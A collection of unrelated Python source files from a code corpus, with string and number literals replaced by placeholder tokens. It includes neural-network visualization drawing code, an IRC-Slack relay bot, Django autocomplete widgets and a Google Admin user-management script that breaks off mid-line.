boost_gamma = self . state . layer_boost_gamma , <EOL> neg_pos_colors = ( ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) ) ) <EOL> else : <EOL> layer_dat_3D_normalized = tile_images_normalize ( layer_dat_3D , <EOL> boost_indiv = self . state . layer_boost_indiv , <EOL> boost_gamma = self . state . layer_boost_gamma ) <EOL> display_3D = layer_dat_3D_normalized <EOL> display_3D = ensure_float01 ( display_3D ) <EOL> if len ( display_3D . shape ) == <NUM_LIT:3> : <EOL> display_3D = display_3D [ : , : , : , np . newaxis ] <EOL> if display_3D . shape [ <NUM_LIT:3> ] == <NUM_LIT:1> : <EOL> display_3D = np . tile ( display_3D , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> if display_3D . shape [ <NUM_LIT:1> ] == <NUM_LIT:1> : <EOL> display_3D = np . tile ( display_3D , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> if self . state . layers_show_back and not self . state . pattern_mode : <EOL> padval = self . settings . caffevis_layer_clr_back_background <EOL> else : <EOL> padval = self . 
settings . window_background <EOL> highlights = [ None ] * n_tiles <EOL> with self . state . lock : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> highlights [ self . state . selected_unit ] = self . settings . caffevis_layer_clr_cursor <EOL> if self . state . backprop_selection_frozen and self . state . layer == self . state . backprop_layer : <EOL> highlights [ self . state . backprop_unit ] = self . settings . caffevis_layer_clr_back_sel <EOL> _ , display_2D = tile_images_make_tiles ( display_3D , hw = ( tile_rows , tile_cols ) , padval = padval , highlights = highlights ) <EOL> if display_3D_highres is None : <EOL> display_3D_highres = display_3D <EOL> state_layers_pane_zoom_mode = self . state . layers_pane_zoom_mode <EOL> assert state_layers_pane_zoom_mode in ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> if state_layers_pane_zoom_mode == <NUM_LIT:0> : <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( display_2D , pane . data . shape ) <EOL> elif state_layers_pane_zoom_mode == <NUM_LIT:1> : <EOL> unit_data = display_3D_highres [ self . state . selected_unit ] <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( unit_data , pane . data . shape ) <EOL> else : <EOL> display_2D_resize = ensure_uint255_and_resize_to_fit ( display_2D , pane . data . shape ) * <NUM_LIT:0> <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> pane . data [ <NUM_LIT:0> : display_2D_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : display_2D_resize . shape [ <NUM_LIT:1> ] , : ] = display_2D_resize <EOL> if self . settings . caffevis_label_layers and self . state . layer in self . settings . caffevis_label_layers and self . labels and self . state . cursor_area == '<STR_LIT>' : <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . caffevis_label_face ) , <EOL> '<STR_LIT>' : self . settings . caffevis_label_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . caffevis_label_clr ) , <EOL> '<STR_LIT>' : self . 
settings . caffevis_label_thick } <EOL> loc_base = self . settings . caffevis_label_loc [ : : - <NUM_LIT:1> ] <EOL> lines = [ FormattedString ( self . labels [ self . state . selected_unit ] , defaults ) ] <EOL> cv2_typeset_text ( pane . data , lines , loc_base ) <EOL> return display_3D_highres <EOL> def _draw_aux_pane ( self , pane , layer_data_normalized ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> mode = None <EOL> with self . state . lock : <EOL> if self . state . cursor_area == '<STR_LIT>' : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT>' <EOL> if mode == '<STR_LIT>' : <EOL> unit_data = layer_data_normalized [ self . state . selected_unit ] <EOL> unit_data_resize = ensure_uint255_and_resize_to_fit ( unit_data , pane . data . shape ) <EOL> pane . data [ <NUM_LIT:0> : unit_data_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : unit_data_resize . shape [ <NUM_LIT:1> ] , : ] = unit_data_resize <EOL> elif mode == '<STR_LIT>' : <EOL> self . _draw_prob_labels_pane ( pane ) <EOL> def _draw_back_pane ( self , pane ) : <EOL> mode = None <EOL> with self . state . lock : <EOL> back_enabled = self . state . back_enabled <EOL> back_mode = self . state . back_mode <EOL> back_filt_mode = self . state . back_filt_mode <EOL> state_layer = self . state . layer <EOL> selected_unit = self . state . selected_unit <EOL> back_what_to_disp = self . get_back_what_to_disp ( ) <EOL> if back_what_to_disp == '<STR_LIT>' : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> elif back_what_to_disp == '<STR_LIT>' : <EOL> pane . data [ : ] = to_255 ( self . settings . stale_background ) <EOL> else : <EOL> grad_blob = self . net . blobs [ '<STR_LIT:data>' ] . diff <EOL> grad_blob = grad_blob [ <NUM_LIT:0> ] <EOL> grad_blob = grad_blob . transpose ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> grad_img = grad_blob [ : , : , self . 
_net_channel_swap_inv ] <EOL> assert back_mode in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert back_filt_mode in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if back_filt_mode == '<STR_LIT>' : <EOL> grad_img = norm01c ( grad_img , <NUM_LIT:0> ) <EOL> elif back_filt_mode == '<STR_LIT>' : <EOL> grad_img = grad_img . mean ( axis = <NUM_LIT:2> ) <EOL> grad_img = norm01c ( grad_img , <NUM_LIT:0> ) <EOL> elif back_filt_mode == '<STR_LIT>' : <EOL> grad_img = np . linalg . norm ( grad_img , axis = <NUM_LIT:2> ) <EOL> grad_img = norm01 ( grad_img ) <EOL> else : <EOL> grad_img = np . linalg . norm ( grad_img , axis = <NUM_LIT:2> ) <EOL> cv2 . GaussianBlur ( grad_img , ( <NUM_LIT:0> , <NUM_LIT:0> ) , self . settings . caffevis_grad_norm_blur_radius , grad_img ) <EOL> grad_img = norm01 ( grad_img ) <EOL> if len ( grad_img . shape ) == <NUM_LIT:2> : <EOL> grad_img = np . tile ( grad_img [ : , : , np . newaxis ] , <NUM_LIT:3> ) <EOL> grad_img_resize = ensure_uint255_and_resize_to_fit ( grad_img , pane . data . shape ) <EOL> pane . data [ <NUM_LIT:0> : grad_img_resize . shape [ <NUM_LIT:0> ] , <NUM_LIT:0> : grad_img_resize . shape [ <NUM_LIT:1> ] , : ] = grad_img_resize <EOL> def _draw_jpgvis_pane ( self , pane ) : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> with self . state . lock : <EOL> state_layer , state_selected_unit , cursor_area , show_unit_jpgs = self . state . layer , self . state . selected_unit , self . state . cursor_area , self . state . show_unit_jpgs <EOL> try : <EOL> self . settings . caffevis_jpgvis_layers <EOL> except : <EOL> print '<STR_LIT>' <EOL> raise <EOL> if self . settings . caffevis_jpgvis_remap and state_layer in self . settings . caffevis_jpgvis_remap : <EOL> img_key_layer = self . settings . caffevis_jpgvis_remap [ state_layer ] <EOL> else : <EOL> img_key_layer = state_layer <EOL> if self . settings . caffevis_jpgvis_layers and img_key_layer in self . settings . 
caffevis_jpgvis_layers and cursor_area == '<STR_LIT>' and show_unit_jpgs : <EOL> img_key = ( img_key_layer , state_selected_unit , pane . data . shape ) <EOL> img_resize = self . img_cache . get ( img_key , None ) <EOL> if img_resize is None : <EOL> with self . state . lock : <EOL> self . state . jpgvis_to_load_key = img_key <EOL> pane . data [ : ] = to_255 ( self . settings . stale_background ) <EOL> elif img_resize . nbytes == <NUM_LIT:0> : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> else : <EOL> pane . data [ : img_resize . shape [ <NUM_LIT:0> ] , : img_resize . shape [ <NUM_LIT:1> ] , : ] = img_resize <EOL> else : <EOL> pane . data [ : ] = to_255 ( self . settings . window_background ) <EOL> def handle_key ( self , key , panes ) : <EOL> return self . state . handle_key ( key ) <EOL> def get_back_what_to_disp ( self ) : <EOL> '''<STR_LIT>''' <EOL> if ( self . state . cursor_area == '<STR_LIT>' and not self . state . backprop_selection_frozen ) or not self . state . back_enabled : <EOL> return '<STR_LIT>' <EOL> elif self . state . back_stale : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def set_debug ( self , level ) : <EOL> self . debug_level = level <EOL> self . proc_thread . debug_level = level <EOL> self . jpgvis_thread . debug_level = level <EOL> def draw_help ( self , help_pane , locy ) : <EOL> defaults = { '<STR_LIT>' : getattr ( cv2 , self . settings . help_face ) , <EOL> '<STR_LIT>' : self . settings . help_fsize , <EOL> '<STR_LIT>' : to_255 ( self . settings . help_clr ) , <EOL> '<STR_LIT>' : self . settings . help_thick } <EOL> loc_base = self . settings . help_loc [ : : - <NUM_LIT:1> ] <EOL> locx = loc_base [ <NUM_LIT:0> ] <EOL> lines = [ ] <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults ) ] ) <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults ) ] ) <EOL> kl , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kr , _ = self . bindings . 
get_key_help ( '<STR_LIT>' ) <EOL> ku , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kd , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> klf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> krf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kuf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> kdf , _ = self . bindings . get_key_help ( '<STR_LIT>' ) <EOL> keys_nav_0 = '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:0> ] for kk in ( kl , kr , ku , kd ) ] ) <EOL> keys_nav_1 = '<STR_LIT>' <EOL> if len ( kl ) > <NUM_LIT:1> and len ( kr ) > <NUM_LIT:1> and len ( ku ) > <NUM_LIT:1> and len ( kd ) > <NUM_LIT:1> : <EOL> keys_nav_1 += '<STR_LIT>' <EOL> keys_nav_1 += '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:1> ] for kk in ( kl , kr , ku , kd ) ] ) <EOL> keys_nav_f = '<STR_LIT:U+002C>' . join ( [ kk [ <NUM_LIT:0> ] for kk in ( klf , krf , kuf , kdf ) ] ) <EOL> nav_string = '<STR_LIT>' % ( keys_nav_0 , keys_nav_1 , keys_nav_f ) <EOL> lines . append ( [ FormattedString ( '<STR_LIT>' , defaults , width = <NUM_LIT> , align = '<STR_LIT:right>' ) , <EOL> FormattedString ( nav_string , defaults ) ] ) <EOL> for tag in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> key_strings , help_string = self . bindings . get_key_help ( tag ) <EOL> label = '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( key_strings ) ) <EOL> lines . append ( [ FormattedString ( label , defaults , width = <NUM_LIT> , align = '<STR_LIT:right>' ) , <EOL> FormattedString ( help_string , defaults ) ] ) <EOL> locy = cv2_typeset_text ( help_pane . data , lines , ( locx , locy ) , <EOL> line_spacing = self . settings . help_line_spacing ) <EOL> return locy </s>
<s> import os <EOL> from setuptools import find_packages , setup <EOL> name = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> readme = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> long_description = open ( readme ) . read ( ) <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> setup ( name = name , <EOL> version = version , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> classifiers = classifiers , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> tests_require = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) <EOL> ) </s>
<s> import sys <EOL> sys . dont_write_bytecode = True <EOL> import sys <EOL> import time <EOL> from ircclient . struct import Message <EOL> from ircclient . client import DispatchClient as IrcClient <EOL> from bot import BotMixin <EOL> from util import dbg , load_config <EOL> def log_send ( s ) : <EOL> print ( '<STR_LIT>' , s , ) <EOL> class IrcBot ( BotMixin ) : <EOL> def __init__ ( self , host , port , config ) : <EOL> self . name = config . get ( '<STR_LIT:name>' , None ) <EOL> self . last_ping = <NUM_LIT:0> <EOL> self . bot_plugins = [ ] <EOL> self . irc_client = None <EOL> self . addr = ( host , port ) <EOL> self . plugin = '<STR_LIT>' <EOL> self . config = config <EOL> self . relay_outs = [ ] <EOL> assert self . config <EOL> def connect ( self ) : <EOL> """<STR_LIT>""" <EOL> print ( '<STR_LIT>' , self . addr ) <EOL> self . irc_client = IrcClient ( self . addr , blocking = False ) <EOL> self . irc_client . socket . send_callback = log_send <EOL> self . irc_client . connect ( ) <EOL> def init ( self ) : <EOL> self . connect ( ) <EOL> self . load_plugins ( ) <EOL> def process ( self ) : <EOL> self . irc_client . runloop_unit ( ) <EOL> while True : <EOL> message = self . irc_client . dispatch ( raw = True ) <EOL> if message : <EOL> self . input ( message ) <EOL> self . crons ( ) <EOL> self . output ( ) <EOL> if not self . irc_client . dispatchable ( ) : <EOL> break <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> def input ( self , data ) : <EOL> data = Message ( data ) <EOL> function_name = "<STR_LIT>" + data . type . lower ( ) <EOL> dbg ( "<STR_LIT>" . format ( function_name ) ) <EOL> for plugin in self . bot_plugins : <EOL> plugin . register_jobs ( ) <EOL> plugin . do ( function_name , data ) <EOL> def autoping ( self ) : <EOL> now = int ( time . time ( ) ) <EOL> if now > self . last_ping + <NUM_LIT:30> : <EOL> self . irc_client . send_line ( '<STR_LIT>' ) <EOL> self . last_ping = now <EOL> def send_item ( self , data ) : <EOL> self . 
irc_client ( data ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> def relay ( self , bot , relay_ins ) : <EOL> def channel_for ( channel_id ) : <EOL> return bot . slack_client . server . channels . find ( channel_id ) <EOL> def name ( channel ) : <EOL> if self . name : <EOL> if not channel . name . startswith ( self . name ) : <EOL> return None <EOL> return channel . name . split ( '<STR_LIT:->' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> else : <EOL> return channel . name <EOL> for data in relay_ins : <EOL> if '<STR_LIT>' in data : <EOL> channel = channel_for ( data [ '<STR_LIT>' ] ) <EOL> if channel is None : <EOL> continue <EOL> if data [ '<STR_LIT:type>' ] == '<STR_LIT>' : <EOL> line = u'<STR_LIT>' . format ( name ( channel ) ) <EOL> self . irc_client . send_line ( line ) <EOL> elif data [ '<STR_LIT:type>' ] == '<STR_LIT:message>' : <EOL> print ( '<STR_LIT>' , data ) <EOL> message = data . get ( '<STR_LIT:text>' , '<STR_LIT>' ) <EOL> try : <EOL> import html <EOL> message = html . unescape ( message ) <EOL> except ImportError : <EOL> pass <EOL> message = message . replace ( '<STR_LIT:\r>' , '<STR_LIT:U+0020>' ) . replace ( '<STR_LIT:\n>' , r'<STR_LIT:U+0020>' ) <EOL> user_id = data . get ( '<STR_LIT:user>' , None ) <EOL> if user_id : <EOL> user = bot . slack_client . server . users . find ( user_id ) <EOL> else : <EOL> user = None <EOL> user <EOL> if message : <EOL> line = u'<STR_LIT>' . format ( name ( channel ) , message ) <EOL> self . irc_client . send_line ( line ) <EOL> else : <EOL> line = u'<STR_LIT>' . format ( self . config [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) , unicode ( data ) ) <EOL> self . irc_client . send_line ( line ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from util import main_loop <EOL> config = load_config ( '<STR_LIT>' ) <EOL> debug = config [ "<STR_LIT>" ] <EOL> host = config [ '<STR_LIT>' ] [ '<STR_LIT:host>' ] <EOL> port = config [ '<STR_LIT>' ] . 
get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> bot = IrcBot ( host , port , config = config ) <EOL> site_plugins = [ ] <EOL> files_currently_downloading = [ ] <EOL> job_hash = { } <EOL> if config . get ( '<STR_LIT>' , None ) : <EOL> import daemon <EOL> with daemon . DaemonContext ( ) : <EOL> main_loop ( bot , config ) <EOL> main_loop ( bot , config ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> from django import VERSION <EOL> from django import forms <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils import six <EOL> class WidgetMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , url = None , forward = None , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . url = url <EOL> self . forward = forward or [ ] <EOL> super ( WidgetMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> def build_attrs ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> attrs = super ( WidgetMixin , self ) . build_attrs ( * args , ** kwargs ) <EOL> if self . url is not None : <EOL> attrs [ '<STR_LIT>' ] = self . url <EOL> autocomplete_function = getattr ( self , '<STR_LIT>' , None ) <EOL> if autocomplete_function : <EOL> attrs . setdefault ( '<STR_LIT>' , <EOL> autocomplete_function ) <EOL> if self . forward : <EOL> attrs . setdefault ( '<STR_LIT>' , <EOL> '<STR_LIT:U+002C>' . join ( self . forward ) ) <EOL> return attrs <EOL> def filter_choices_to_render ( self , selected_choices ) : <EOL> """<STR_LIT>""" <EOL> self . choices = [ c for c in self . choices if <EOL> six . text_type ( c [ <NUM_LIT:0> ] ) in selected_choices ] <EOL> def render_options ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> selected_choices_arg = <NUM_LIT:1> if VERSION < ( <NUM_LIT:1> , <NUM_LIT:10> ) else <NUM_LIT:0> <EOL> selected_choices = [ c for c in args [ selected_choices_arg ] if c ] <EOL> if self . url : <EOL> all_choices = copy . copy ( self . choices ) <EOL> self . filter_choices_to_render ( selected_choices ) <EOL> html = super ( WidgetMixin , self ) . render_options ( * args ) <EOL> if self . url : <EOL> self . choices = all_choices <EOL> return html <EOL> def _get_url ( self ) : <EOL> if self . _url is None : <EOL> return None <EOL> if '<STR_LIT:/>' in self . _url : <EOL> return self . _url <EOL> return reverse ( self . _url ) <EOL> def _set_url ( self , url ) : <EOL> self . 
_url = url <EOL> url = property ( _get_url , _set_url ) <EOL> class Select ( WidgetMixin , forms . Select ) : <EOL> """<STR_LIT>""" <EOL> class SelectMultiple ( WidgetMixin , forms . SelectMultiple ) : <EOL> """<STR_LIT>""" <EOL> class QuerySetSelectMixin ( WidgetMixin ) : <EOL> """<STR_LIT>""" <EOL> def filter_choices_to_render ( self , selected_choices ) : <EOL> """<STR_LIT>""" <EOL> self . choices . queryset = self . choices . queryset . filter ( <EOL> pk__in = [ c for c in selected_choices if c ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from dal_select2 . widgets import TagSelect2 <EOL> from django import VERSION <EOL> from django . utils import six <EOL> class TaggitSelect2 ( TagSelect2 ) : <EOL> """<STR_LIT>""" <EOL> def render_options ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> selected_choices_arg = <NUM_LIT:1> if VERSION < ( <NUM_LIT:1> , <NUM_LIT:10> ) else <NUM_LIT:0> <EOL> selected_choices = args [ selected_choices_arg ] <EOL> if isinstance ( selected_choices , six . text_type ) : <EOL> choices = [ c . strip ( ) for c in selected_choices . split ( '<STR_LIT:U+002C>' ) ] <EOL> else : <EOL> choices = [ c . tag . name for c in selected_choices if c ] <EOL> options = [ <EOL> '<STR_LIT>' % ( <EOL> c , c ) for c in choices <EOL> ] <EOL> return '<STR_LIT:\n>' . join ( options ) </s>
<s> from django . contrib . contenttypes . fields import GenericForeignKey <EOL> from django . db import models <EOL> from django . utils . encoding import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class TestModel ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> content_type = models . ForeignKey ( <EOL> '<STR_LIT>' , <EOL> null = True , <EOL> blank = True , <EOL> editable = False , <EOL> ) <EOL> object_id = models . PositiveIntegerField ( <EOL> null = True , <EOL> blank = True , <EOL> editable = False , <EOL> ) <EOL> test = GenericForeignKey ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for_inline = models . ForeignKey ( <EOL> '<STR_LIT>' , <EOL> null = True , <EOL> blank = True , <EOL> related_name = '<STR_LIT>' <EOL> ) <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> default_app_config = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django . core . wsgi import get_wsgi_application <EOL> sys . path . insert ( <EOL> <NUM_LIT:0> , <EOL> os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) ) ) <EOL> ) <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> application = get_wsgi_application ( ) </s>
<s> def test_it ( binbb , repos_cfg ) : <EOL> """<STR_LIT>""" <EOL> expected_words = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . split ( ) <EOL> for account_name , rep_cfg in repos_cfg . items ( ) : <EOL> for repo_name in rep_cfg . keys ( ) : <EOL> bbcmd = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , account_name , "<STR_LIT>" , repo_name ] <EOL> res = binbb . sysexec ( * bbcmd ) <EOL> for word in expected_words : <EOL> assert word in res <EOL> lines = res . strip ( ) . splitlines ( ) <EOL> assert len ( lines ) >= <NUM_LIT:8> <EOL> return </s>
<s> import os <EOL> import sys <EOL> import codecs <EOL> import pprint <EOL> from apiclient . discovery import build <EOL> import httplib2 <EOL> from oauth2client . client import flow_from_clientsecrets <EOL> from oauth2client . file import Storage <EOL> from oauth2client import tools <EOL> import argparse <EOL> import simplejson as json <EOL> from const import * <EOL> from utils import * <EOL> def show_active_resource ( resource ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] , resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ) <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> for email in resource [ '<STR_LIT>' ] : <EOL> if email . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % email [ '<STR_LIT:address>' ] <EOL> else : <EOL> print "<STR_LIT>" % email [ '<STR_LIT:address>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> for email in resource [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % email <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> def show_deleted_resource ( resource ) : <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> print "<STR_LIT>" % resource [ '<STR_LIT>' ] <EOL> def show_resource ( resource ) : <EOL> if resource . 
has_key ( '<STR_LIT>' ) : <EOL> show_deleted_resource ( resource ) <EOL> else : <EOL> show_active_resource ( resource ) <EOL> def show_resource_list ( resources , verbose ) : <EOL> for resource in resources : <EOL> if verbose : <EOL> show_resource ( resource ) <EOL> print "<STR_LIT>" <EOL> else : <EOL> if resource . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT>' ] , resource [ '<STR_LIT>' ] ) <EOL> else : <EOL> print "<STR_LIT>" % ( resource [ '<STR_LIT>' ] , <EOL> resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] , <EOL> resource [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ) <EOL> def list_user ( sv , args ) : <EOL> users = [ ] <EOL> pageToken = None <EOL> while True : <EOL> params = { } <EOL> if args . domain : <EOL> params [ '<STR_LIT>' ] = args . domain <EOL> if args . customer : <EOL> params [ '<STR_LIT>' ] = args . customer <EOL> if args . reverse : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if args . showDeleted : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> if args . orderBy : <EOL> params [ '<STR_LIT>' ] = args . orderBy <EOL> if args . query : <EOL> params [ '<STR_LIT>' ] = args . query . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . maxResults : <EOL> params [ '<STR_LIT>' ] = args . maxResults <EOL> if pageToken : <EOL> params [ '<STR_LIT>' ] = pageToken <EOL> if not params . has_key ( '<STR_LIT>' ) and not params . has_key ( '<STR_LIT>' ) : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> r = sv . list ( ** params ) . execute ( ) <EOL> if r . has_key ( '<STR_LIT>' ) : <EOL> if args . jsonPretty or args . json : <EOL> for user in r [ '<STR_LIT>' ] : <EOL> users . append ( user ) <EOL> else : <EOL> show_resource_list ( r [ '<STR_LIT>' ] , args . verbose ) <EOL> if r . has_key ( '<STR_LIT>' ) : <EOL> pageToken = r [ '<STR_LIT>' ] <EOL> else : <EOL> break <EOL> if args . 
jsonPretty : <EOL> if len ( users ) == <NUM_LIT:1> : <EOL> print to_pretty_json ( users [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print to_pretty_json ( users ) <EOL> elif args . json : <EOL> if len ( users ) == <NUM_LIT:1> : <EOL> print to_json ( users [ <NUM_LIT:0> ] ) <EOL> else : <EOL> print to_json ( users ) <EOL> def get_user ( sv , args ) : <EOL> r = sv . get ( userKey = args . userKey ) . execute ( ) <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def insert_user ( sv , args ) : <EOL> body = { '<STR_LIT:name>' : { '<STR_LIT>' : args . familyName . decode ( '<STR_LIT:utf-8>' ) , <EOL> '<STR_LIT>' : args . givenName . decode ( '<STR_LIT:utf-8>' ) } , <EOL> '<STR_LIT:password>' : args . password , <EOL> '<STR_LIT>' : args . primaryEmail } <EOL> if args . changePasswordAtNextLogin : <EOL> body [ '<STR_LIT>' ] = True if args . changePasswordAtNextLogin == '<STR_LIT:true>' else False <EOL> if args . suspended : <EOL> body [ '<STR_LIT>' ] = True if args . suspended == '<STR_LIT:true>' else False <EOL> if args . orgUnitPath : <EOL> body [ '<STR_LIT>' ] = args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) <EOL> r = sv . insert ( body = body ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> def patch_user ( sv , args ) : <EOL> body = { } <EOL> if args . familyName or args . givenName : <EOL> body [ '<STR_LIT:name>' ] = { } <EOL> if args . familyName : <EOL> body [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] = args . familyName . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . givenName : <EOL> body [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] = args . givenName . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . orgUnitPath : <EOL> body [ '<STR_LIT>' ] = args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) <EOL> if args . 
suspended : <EOL> body [ '<STR_LIT>' ] = True if args . suspended == '<STR_LIT:true>' else False <EOL> if args . changePasswordAtNextLogin : <EOL> body [ '<STR_LIT>' ] = True if args . changePasswordAtNextLogin == '<STR_LIT:true>' else False <EOL> if args . password : <EOL> body [ '<STR_LIT:password>' ] = args . password <EOL> if args . primaryEmail : <EOL> body [ '<STR_LIT>' ] = args . primaryEmail <EOL> if len ( body ) : <EOL> r = sv . patch ( userKey = args . userKey , body = body ) . execute ( ) <EOL> if args . verbose : <EOL> if args . jsonPretty : <EOL> print to_pretty_json ( r ) <EOL> elif args . json : <EOL> print to_json ( r ) <EOL> else : <EOL> show_resource ( r ) <EOL> else : <EOL> print '<STR_LIT>' <EOL> def delete_user ( sv , args ) : <EOL> r = sv . delete ( userKey = args . userKey ) . execute ( ) <EOL> def undelete_user ( sv , args ) : <EOL> body = { '<STR_LIT>' : args . orgUnitPath . decode ( '<STR_LIT:utf-8>' ) } <EOL> r = sv . undelete ( userKey = args . userKey , body = body ) . execute ( ) <EOL> def setadmin_user ( sv , args ) : <EOL> r = sv . makeAdmin 